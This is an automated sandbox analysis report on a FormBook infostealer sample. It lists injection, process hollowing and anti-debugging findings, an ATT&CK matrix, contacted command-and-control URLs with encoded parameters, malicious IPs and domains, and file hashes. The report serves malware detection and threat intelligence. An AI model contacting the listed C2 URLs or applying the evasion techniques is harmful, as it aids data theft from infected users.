          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03093D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03093D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03093D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03093D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03093D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03093D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03093D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03103540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03133D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030A7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030AC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030AC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03082D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03082D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03082D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03082D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03082D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030B2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030B2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030B2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030B2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030BFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030BFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030B35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_031505AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_031505AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030B1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030B1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030B1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03106DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03106DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03106DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03106DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03106DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03106DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03138DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0309D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0309D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0314FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0314FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0314FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0314FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\wlanext.exe Process token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Contains functionality to prevent local Windows debugging
          Source: C:\Users\user\Desktop\eQLPRPErea.exe Code function: 1_2_6FC61000 YVfgfgfgfgfg,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\eQLPRPErea.exe Section loaded: unknown target: C:\Users\user\Desktop\eQLPRPErea.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\eQLPRPErea.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\eQLPRPErea.exe Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\eQLPRPErea.exe Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\wlanext.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\wlanext.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\eQLPRPErea.exe Thread register set: target process: 3424
          Source: C:\Windows\SysWOW64\wlanext.exe Thread register set: target process: 3424
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\eQLPRPErea.exe Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\eQLPRPErea.exe Section unmapped: C:\Windows\SysWOW64\wlanext.exe base address: EA0000
          Source: C:\Users\user\Desktop\eQLPRPErea.exe Process created: C:\Users\user\Desktop\eQLPRPErea.exe 'C:\Users\user\Desktop\eQLPRPErea.exe'
          Source: C:\Windows\SysWOW64\wlanext.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\eQLPRPErea.exe'
          Source: explorer.exe, 00000005.00000002.954492483.0000000000AD8000.00000004.00000020.sdmp Binary or memory string: ProgmanMD6
          Source: explorer.exe, 00000005.00000000.702734377.0000000001080000.00000002.00000001.sdmp, wlanext.exe, 00000009.00000002.955795157.0000000005680000.00000002.00000001.sdmp Binary or memory string: Program Manager
          Source: explorer.exe, 00000005.00000002.964268158.0000000005E50000.00000004.00000001.sdmp, wlanext.exe, 00000009.00000002.955795157.0000000005680000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.702734377.0000000001080000.00000002.00000001.sdmp, wlanext.exe, 00000009.00000002.955795157.0000000005680000.00000002.00000001.sdmp Binary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.702734377.0000000001080000.00000002.00000001.sdmp, wlanext.exe, 00000009.00000002.955795157.0000000005680000.00000002.00000001.sdmp Binary or memory string: Progmanlock
          Source: explorer.exe, 00000005.00000000.715995251.000000000A716000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd5D

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match, file source: 00000009.00000002.954706104.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 00000009.00000002.954738105.0000000000D00000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 00000003.00000001.697538747.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, file source: 00000001.00000002.704506840.000000001EB20000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 00000009.00000002.954361927.0000000000850000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 00000003.00000002.735925804.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 00000003.00000002.735695212.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 00000003.00000002.735263364.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 3.2.eQLPRPErea.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, file source: 1.2.eQLPRPErea.exe.1eb20000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara match, file source: 1.2.eQLPRPErea.exe.1eb20000.5.unpack, type: UNPACKEDPE
          Source: Yara match, file source: 3.1.eQLPRPErea.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, file source: 3.1.eQLPRPErea.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, file source: 3.2.eQLPRPErea.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          Yara detected FormBook (same Yara matches as listed under Stealing of Sensitive Information)

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Native API 1 | Path Interception | Process Injection 612 | Virtualization/Sandbox Evasion 3 | OS Credential Dumping | Security Software Discovery 141 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot 1
          Default Accounts | Shared Modules 1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Process Injection 612 | LSASS Memory | Virtualization/Sandbox Evasion 3 | Remote Desktop Protocol | Clipboard Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Deobfuscate/Decode Files or Information 1 | Security Account Manager | Process Discovery 2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 3 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 13 | SIM Card Swap | Carrier Billing Fraud |
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing 11 | LSA Secrets | File and Directory Discovery 2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | System Information Discovery 12 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |

          Behavior Graph

          [Behavior graph: ID 383832, sample eQLPRPErea.exe, start date 08/04/2021, architecture WINDOWS, score 100. Process chain: eQLPRPErea.exe (drops C:\Users\user\AppData\Local\...\e4utfxiuc.dll, PE32; detected unpacking, maps memory into another process, RDTSC-based virtualization detection, anti-debugging) -> eQLPRPErea.exe (thread injection, memory mapping, process hollowing, APC queuing) -> explorer.exe (injected; contacts www.appgusher.com 156.254.221.72:80, td-balancer-dc11-60-177.wixdns.net 185.230.60.177:80 and 23 other IPs or domains; DNS queries to low-reputation domains) -> wlanext.exe (thread injection, memory mapping, RDTSC-based virtualization detection) -> cmd.exe -> conhost.exe.]


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          eQLPRPErea.exe | 29% | Virustotal |
          eQLPRPErea.exe | 31% | ReversingLabs | Win32.Spyware.Noon

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          Source | Detection | Scanner | Label
          3.2.eQLPRPErea.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          9.2.wlanext.exe.8bf110.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
          1.2.eQLPRPErea.exe.1eb20000.5.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          3.1.eQLPRPErea.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          9.2.wlanext.exe.3597960.5.unpack | 100% | Avira | TR/Patched.Ren.Gen
          1.2.eQLPRPErea.exe.6fc60000.6.unpack | 100% | Avira | HEUR/AGEN.1131513

          Domains

          Source | Detection | Scanner | Label
          www.bedpee.com | 1% | Virustotal |
          www.420vaca.com | 0% | Virustotal |
          playfulpainters.com | 5% | Virustotal |
          www.qcmax.com | 0% | Virustotal |

          URLs


          Domains and IPs

          Contacted Domains


Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
--- | --- | --- | ---
www.stone-master.info/aqu2/ | true | Avira URL Cloud: safe | low
http://www.qcmax.com/aqu2/?mbyD=toEAtfXwLESsnLakC+2t7dOdvm85giv91w8vwljOeFfqXEeY4s07KiqgA7NZtvHKIujf&EhUtvx=xdFt3xAHnXiTPL3p | true | Avira URL Cloud: safe | unknown
http://www.heliumhubs.com/aqu2/?mbyD=I0+E1VrnC0QGGj/3MDw3ZvYPYqqz6w+SLlQhXTSeWc0xAJh7y/Tkq/xacGspuDOT4pat&EhUtvx=xdFt3xAHnXiTPL3p | false | Avira URL Cloud: safe | unknown
http://www.autobrehna.com/aqu2/?mbyD=wtLrPw5EqSQfBmzZFC+8Ts+SNzTM/uZNWoE4YkZin0I3f7v8IKK2ESUj0jO/FukH5b4y&EhUtvx=xdFt3xAHnXiTPL3p | true | Avira URL Cloud: malware | unknown
http://www.dottproject.com/aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=8qPweG0Om7gnfxctK98F/0dsoL0lvZuH4d0zJ/AKmRPMF5KPhADxZAlCqmjmmKP5/AO4 | true | Avira URL Cloud: safe | unknown
http://www.420vaca.com/aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=8Y6pPms/JYXhy9shIA4J0qFhxM8TaW5F1yYhRg6zTM8CMz/87KRxOEEOI1BJ9RhXNxF4 | true | Avira URL Cloud: malware | unknown
http://www.playfulpainters.com/aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=K5Kf6zclTLbsCVqtOfN1gGfLaJuyFjl9HZAUKi2taEuEh7VLUYcol1qkdE1d13SuPReH | false | Avira URL Cloud: malware | unknown
http://www.pmrack.com/aqu2/?mbyD=eNunAjC4pU9oqobNMAvEDZJ9lTiY8rojHdPmkqZsRd0+OOiVSsWrKMnHzzNZKvEFUiJI&EhUtvx=xdFt3xAHnXiTPL3p | true | Avira URL Cloud: malware | unknown
http://www.appgusher.com/aqu2/?mbyD=G7QIB1zUm5r+y6hLlZB4xuNK9AxtrOyX5//PKXARlhVXvhDVDTjLo0W6kfT9OEzqeU0h&EhUtvx=xdFt3xAHnXiTPL3p | true | Avira URL Cloud: malware | unknown
http://www.bedpee.com/aqu2/?mbyD=73Z2oBzA8M8lSee00VrNW3/poKkDHXg5S3NVAWTjhm9PWEzsaK72sv0Q0ZTHiNL8Dzyy&EhUtvx=xdFt3xAHnXiTPL3p | true | Avira URL Cloud: malware | unknown
http://www.thesixteenthround.net/aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=s0A+R2zrZH16LfLMe9M/AmUzyN8aP2GBLvlZkca4zy1idqDqw+DRrqUwOXi4yQd3lVO7 | true | Avira URL Cloud: malware | unknown

                                              URLs from Memory and Binaries


                                                                      Contacted IPs


Public

IP | Domain | Country | ASN | ASN Name | Malicious
--- | --- | --- | --- | --- | ---
91.195.240.94 | www.dottproject.com | Germany | 47846 | SEDO-ASDE | true
135.181.58.27 | pmrack.com | Germany | 24940 | HETZNER-ASDE | true
64.32.22.102 | parking.namesilo.com | United States | 46844 | ST-BGPUS | false
184.168.131.241 | biehnrecords.com | United States | 26496 | AS-26496-GO-DADDY-COM-LLCUS | true
62.116.130.8 | www.autobrehna.com | Germany | 15456 | INTERNETX-ASDE | true
104.128.125.95 | www.qcmax.com | United States | 26658 | HENGTONG-IDC-LLCUS | true
185.230.60.177 | td-balancer-dc11-60-177.wixdns.net | Israel | 58182 | WIX_COMIL | true
34.102.136.180 | playfulpainters.com | United States | 15169 | GOOGLEUS | false
13.248.216.40 | www.bedpee.com | United States | 16509 | AMAZON-02US | true
64.190.62.111 | www.420vaca.com | United States | 11696 | NBS11696US | true
156.254.221.72 | www.appgusher.com | Seychelles | 136800 | XIAOZHIYUN1-AS-APICIDCNETWORKUS | true
198.54.117.215 | parkingpage.namecheap.com | United States | 22612 | NAMECHEAP-NETUS | false

General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 383832
Start date: 08.04.2021
Start time: 10:46:52
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 59s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: eQLPRPErea.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 23
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@7/3@15/12
EGA Information: Failed
HDC Information:
• Successful, ratio: 24.2% (good quality ratio 21.9%)
• Quality average: 73.7%
• Quality standard deviation: 31.6%
HCA Information:
• Successful, ratio: 92%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 40.88.32.150, 23.54.113.53, 52.147.198.201, 104.43.193.48, 20.82.210.154, 23.10.249.26, 23.10.249.43, 104.43.139.144, 20.50.102.62, 52.155.217.156, 20.54.26.129, 168.61.161.212, 52.255.188.83, 13.88.21.125
• Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, consumerrp-displaycatalog-aks2eap.md.mp.microsoft.com.akadns.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, skypedataprdcolcus16.cloudapp.net, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net

                                                                      Simulations

                                                                      Behavior and APIs

                                                                      No simulations

                                                                      Joe Sandbox View / Context

                                                                      IPs


                                                                      Domains

                                                                      Match                      Associated Sample Name / URL                          Detection   Context
                                                                      www.qcmax.com              ARBmDNJS7m.exe                                        malicious   104.128.125.95
                                                                      www.bedpee.com             invoice bank.xlsx                                     malicious   13.248.216.40
                                                                      parking.namesilo.com       vbc.exe                                               malicious   209.141.38.71
                                                                                                 Payment Slip.exe                                      malicious   192.161.187.200
                                                                                                 UTcQK0heAfGWTLw.exe                                   malicious   64.32.22.102
                                                                                                 RFQ # 1014397402856.pdf.exe                           malicious   204.188.203.155
                                                                                                 invoice bank.xlsx                                     malicious   198.251.84.92
                                                                                                 Payment_Advice_REF344266.xlsx                         malicious   198.251.84.92
                                                                                                 Revised Signed Proforma Invoice 000856453553.exe      malicious   188.164.131.200
                                                                                                 ZsA5S2nQAa.exe                                        malicious   168.235.88.209
                                                                                                 New Purchase Order.exe                                malicious   204.188.203.155
                                                                                                 h8lD4SWL35.exe                                        malicious   188.164.131.200
                                                                                                 d3r3jm1oKY.exe                                        malicious   70.39.125.244
                                                                                                 9311-32400.pdf.exe                                    malicious   45.58.190.82
                                                                                                 Invoice ICO ZRT.xlsx                                  malicious   192.161.187.200
                                                                                                 RFQ MEDICAL EQUIPMENT_PDF.exe                         malicious   209.141.38.71
                                                                                                 v708469737489630001.exe                               malicious   192.161.187.200
                                                                                                 SPmG3TLdax.exe                                        malicious   204.188.203.155
                                                                                                 RDAW-180-47D.exe                                      malicious   64.32.22.102
                                                                                                 0HCan2RjnP.exe                                        malicious   107.161.23.204
                                                                                                 1feiNnK6Qd.exe                                        malicious   209.141.38.71
                                                                                                 Yc6FOuQigh.exe                                        malicious   198.251.84.92
                                                                      parkingpage.namecheap.com  PaymentAdvice.exe                                     malicious   198.54.117.218
                                                                                                 DYANAMIC Inquiry.xlsx                                 malicious   198.54.117.216
                                                                                                 Quotation Zhejiang.xlsx                               malicious   198.54.117.215
                                                                                                 TACA20210407.PDF.exe                                  malicious   198.54.117.212
                                                                                                 46578-TR.exe                                          malicious   198.54.117.218
                                                                                                 ALPHA SCIENCE, INC.exe                                malicious   198.54.117.216
                                                                                                 SALINAN SWIFT PRA-PEMBAYARAN UNTUK PEMASANGAN.exe     malicious   198.54.117.217
                                                                                                 1517679127365.exe                                     malicious   198.54.117.216
                                                                                                 BL-2010403L.exe                                       malicious   198.54.117.218
                                                                                                 Shinshin Machinery.exe.exe                            malicious   198.54.117.212
                                                                                                 PDF NEW P.OJerhWEMSj4RnE4Z.exe                        malicious   198.54.117.217
                                                                                                 INV-210318L.exe                                       malicious   198.54.117.212
                                                                                                 Inquiry.docx                                          malicious   198.54.117.218
                                                                                                 BL Draft copy.exe                                     malicious   198.54.117.215
                                                                                                 Order.exe                                             malicious   198.54.117.210
                                                                                                 PO.1183.exe                                           malicious   198.54.117.211
                                                                                                 TSPO0001978-xlxs.exe                                  malicious   198.54.117.216
                                                                                                 evaoRJkeKU.exe                                        malicious   198.54.117.210
                                                                                                 igPVY6UByI.exe                                        malicious   198.54.117.216
                                                                                                 Swift001_jpg.exe                                      malicious   198.54.117.218

                                                                      ASN

                                                                      Match                      Associated Sample Name / URL                          Detection   Context
                                                                      HETZNER-AS DE              vbc.exe                                               malicious   195.201.179.80
                                                                                                 vgUgvbLjyI.exe                                        malicious   195.201.225.248
                                                                                                 Rechnung.doc                                          malicious   46.4.51.158
                                                                                                 6IGbftBsBg.exe                                        malicious   88.99.66.31
                                                                                                 SecuriteInfo.com.W32.AIDetect.malware2.22480.exe      malicious   195.201.225.248
                                                                                                 Revised Invoice No CU 7035.exe                        malicious   78.46.133.81
                                                                                                 ikoAImKWvI.exe                                        malicious   88.99.66.31
                                                                                                 V7UnYc7CCN.exe                                        malicious   88.99.66.31
                                                                                                 uTQdPoKj0h.exe                                        malicious   95.217.123.103
                                                                                                 uTQdPoKj0h.exe                                        malicious   95.217.123.103
                                                                                                 Updated SOA.xlsx                                      malicious   136.243.92.92
                                                                                                 SecuriteInfo.com.W32.AIDetect.malware1.16239.exe      malicious   195.201.225.248
                                                                                                 SecuriteInfo.com.W32.AIDetect.malware1.23167.exe      malicious   195.201.225.248
                                                                                                 receipt-xxxx.htm                                      malicious   88.99.136.47
                                                                                                 comprobante de pago bancario.exe                      malicious   168.119.91.111
                                                                                                 April_2021_Purchase_Order_000000000000000000000000.pdf.exe  malicious   95.217.195.80
                                                                                                 PAY-INV-1007.exe                                      malicious   95.217.195.80
                                                                                                 40JHtWiswn.exe                                        malicious   195.201.225.248
                                                                                                 34#U0e15.exe                                          malicious   116.203.213.72
                                                                                                 PO91361.exe                                           malicious   135.181.76.226
                                                                      ST-BGP US                  UTcQK0heAfGWTLw.exe                                   malicious   64.32.22.102
                                                                                                 RFQ # 1014397402856.pdf.exe                           malicious   204.188.203.155
                                                                                                 BIOTECHPO960488580.exe                                malicious   205.144.171.210
                                                                                                 GJK-KAOHSIUNG-2101.xlsx                               malicious   205.144.171.138
                                                                                                 New Purchase Order.exe                                malicious   204.188.203.155
                                                                                                 9311-32400.pdf.exe                                    malicious   45.58.190.82
                                                                                                 ssyrNaO6AP.dll                                        malicious   70.39.99.196
                                                                                                 5401628864_AWB_28002_2021-17-03 2.exe                 malicious   67.21.94.15
                                                                                                 SPmG3TLdax.exe                                        malicious   204.188.203.155
                                                                                                 RDAW-180-47D.exe                                      malicious   64.32.22.102
                                                                                                 Doc_3847468364836483638463,pdf.exe                    malicious   170.178.168.203
                                                                                                 gV8xdP8bas.exe                                        malicious   104.160.174.169
                                                                                                 DHL.INFORMATION.TRACKING.exe                          malicious   67.21.94.4
                                                                                                 pVXFB33FzO.exe                                        malicious   104.160.174.164
                                                                                                 ICrLYbQDcRrTPg5.exe                                   malicious   67.21.94.4
                                                                                                 Complaint-Copy-676926603-03092021.xls                 malicious   205.144.171.49
                                                                                                 Complaint-Copy-645863057-03092021.xls                 malicious   205.144.171.49
                                                                                                 Complaint-Copy-676926603-03092021.xls                 malicious   205.144.171.49
                                                                                                 Complaint-Copy-645863057-03092021.xls                 malicious   205.144.171.49
                                                                                                 Complaint-Copy-1308127799-03092021.xls                malicious   205.144.171.49
                                                                      SEDO-AS DE                 zIZsNOecPuLdGCf.exe                                   malicious   91.195.240.94
                                                                                                 RMwfvA9kZy.exe                                        malicious   91.195.240.94
                                                                                                 h8lD4SWL35.exe                                        malicious   91.195.240.94
                                                                                                 FIN4.docm                                             malicious   91.195.240.13
                                                                                                 FIN4.docm                                             malicious   91.195.240.13
                                                                                                 FIN4.docm                                             malicious   91.195.240.13
                                                                                                 triage_dropped_file.exe                               malicious   91.195.240.94
                                                                                                 OC CVE9362 _TVOP-MIO 22(C) 2021,pdf.exe               malicious   91.195.240.94
                                                                                                 32ciKQsy2X.exe                                        malicious   91.195.240.94
                                                                                                 quLdcfImUL.exe                                        malicious   91.195.241.137
                                                                                                 Swift.exe                                             malicious   91.195.241.137
                                                                                                 MT LIANG SHENG_Ningbo Notice.xlsx                     malicious   91.195.241.137
                                                                                                 PALERMO PO4215.xlsx                                   malicious   91.195.241.137
                                                                                                 NEW ORDER QUOTATION.xlsx                              malicious   91.195.241.137
                                                                                                 Payment Copy.exe                                      malicious   91.195.240.12
                                                                                                 purchase order#034.exe                                malicious   91.195.240.94
                                                                                                 PS-AVP2-307678.xlsx                                   malicious   91.195.240.94
                                                                                                 #U0646#U0633#U062e#U0629 #U0628#U0646#U0643 #U0633#U0648#U064a#U0641#U062a 0083212 pdf.exe  malicious   91.195.240.94
                                                                                                 FeDex Shipment Confirmation.exe                       malicious   91.195.241.137
                                                                                                 FeDex Shipment Confirmation.exe                       malicious   91.195.241.137

                                                                      JA3 Fingerprints

                                                                      No context

                                                                      Dropped Files

                                                                      Match                                                        Associated Sample Name / URL   Detection   Context
                                                                      C:\Users\user\AppData\Local\Temp\nsl6058.tmp\e4utfxiuc.dll   Quotation Zhejiang.xlsx        malicious

                                                                        Created / dropped Files

                                                                        C:\Users\user\AppData\Local\Temp\35ab8wlx6zqe82u0
                                                                        Process:C:\Users\user\Desktop\eQLPRPErea.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):164864
                                                                        Entropy (8bit):7.998989332403079
                                                                        Encrypted:true
                                                                        SSDEEP:3072:5Uc2cZX//lia9uzqJ1FPe87cVroSCR58XxrviPv0NOtfptbRlR:5Uc2SXli2LbG87uroXR585UcNKbbR
                                                                        MD5:9A9A459A5A231E0F2520C491C61FA1DA
                                                                        SHA1:7FD4E213B226ABE116437E168F0D27844B983592
                                                                        SHA-256:D0728A76A7BF4D436FAC8890A32E8C96B42CCD660B4E48927EB465E334598B1E
                                                                        SHA-512:F4CA81A0DB7340FB23AA4E21667838B8C88D5F3C84F47B48D77CD5CA5CE296C260F31B26A29187AB3739DD7196372D5FD40B5699B5D7D118E6C8E6328BCAE447
                                                                        Malicious:false
                                                                        Reputation:low
